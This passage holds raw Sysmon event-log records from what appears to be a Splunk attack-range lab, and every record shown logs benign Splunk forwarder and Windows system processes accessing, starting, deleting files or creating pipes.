10341000x8000000000000000216807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-11C3-6216-6004-000000003902}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C3-6216-6004-000000003902}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.265{4F8D34B0-11C3-6216-6004-000000003902}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.123{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F147490C3A146066BDB60DC825225E33,SHA256=4DB4D7E3ECCA8BA8C7BF482B71971FE58762DE0D0054443C5C524BA8A854A2E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:48.617{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39C2DB10BD78FD3DB85B03FC4E8E06D9,SHA256=767F388E65EEAA09CBDCB0EC234DCB29BB15CC473A265181421A08E69C24B007,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:48.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A7DD2D14F47E617C65071F47D766B18,SHA256=EBBCF2EC86B41CCE490BF71C3FC98308E5F77FC3A15A4ECB147D12A592DE39B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:48.436{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=248E3614980FD1D92C69AA82DFB996C7,SHA256=D0053B775689F7B529F3B0B4E081A7897D75E7D94ADA5D95A0AD759D7AF432EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:48.217{4F8D34B0-11C3-6216-6104-000000003902}39481132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000288656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:48.579{C8EA50B7-F2AD-6215-C000-000000003802}4856\UIA_PIPE_4856_00005b77C:\Windows\Explorer.EXE 10341000x8000000000000000216848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.576{4F8D34B0-11C5-6216-6204-000000003902}9123388C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C5-6216-6204-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-11C5-6216-6204-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.389{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C5-6216-6204-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.390{4F8D34B0-11C5-6216-6204-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:49.326{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=702CDBD46AD33BC5C007B4710A75FD19,SHA256=E6AC89CB7C00D47D50B76256801FCAC2AAE2BA853A18C11EF382A69A62755A7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:49.623{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9F86D19C2F477910F71DB7EA20640B7,SHA256=A9DD4667F21F5D951F347613405661BFF4CE0A5E9A8A964223CE03C00D11FDCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.733{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE7D3FD64D201B08D2B5E79F023546F,SHA256=CD4B9B5AC7EA5365A8A857B83BD82A2DA89E6CCC807CF9453D4C86AE74B885DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:50.641{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D339F78DED49A7372CAA4B7470975EAB,SHA256=F4783C4A19062208E9A62C0940C1922A24300C02B0A3AE5DDD2A5919DE6FD3A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.404{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73D9AC2425C1122D6315B4AEAFCAB62E,SHA256=FC2C170B95C9979C530FC927F12C8FCB0728400F2FE817E7B1E2BF36D07BBFDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.342{4F8D34B0-11C6-6216-6304-000000003902}30522840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C6-6216-6304-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 